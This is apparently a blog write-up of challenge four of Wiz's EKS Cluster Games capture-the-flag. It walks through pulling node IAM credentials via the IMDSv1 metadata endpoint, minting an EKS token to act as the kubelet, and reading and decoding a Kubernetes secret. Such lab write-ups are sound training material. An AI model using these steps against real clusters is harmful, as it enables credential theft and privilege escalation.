github rss
EKS Cluster Games: Challenge 4 (SPOILERS)
Nov 2, 2023
2 minutes read

This is a writeup of how I solved part four of the EKS Cluster Games. Huge thanks to Wiz for putting this together.

If you haven’t yet, you should start with challenges one, two, and three.

Challenge Four

This time our service account has zero permissions:

root@wiz-eks-challenge:~# kubectl whoami

root@wiz-eks-challenge:~# kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:challenge4:service-account-challenge4" cannot list resource "pods" in API group "" in the namespace "challenge4"

We still have access to the IMDSv1 endpoint and are now able to directly use the node’s IAM role:

root@wiz-eks-challenge:~# curl

root@wiz-eks-challenge:~# aws sts get-caller-identity
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"

Escalating to the Kubelet Identity

Instead of poking around AWS, let’s try to use this role to access the Kubernetes API using the node (kubelet) identity. To do this we need to create an aws-iam-authenticator token. We don’t know the right value for --cluster-name here, but we can guess based on the IAM role name above that it’s probably eks-challenge-cluster:

root@wiz-eks-challenge:~# TOKEN="$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r .status.token)"

root@wiz-eks-challenge:~# kubectl whoami --token "$TOKEN"

Finding the Flag

The first thing we can try to do with this identity is look at secrets, which yields an immediate reward:

root@wiz-eks-challenge:~# kubectl --token "$TOKEN" get secrets
NAME        TYPE     DATA   AGE
node-flag   Opaque   1      27h

root@wiz-eks-challenge:~# kubectl --token "$TOKEN" get secret -o json | jq -r  '.items[].data.flag' | base64 -d


Notes for challenge five.

Back to posts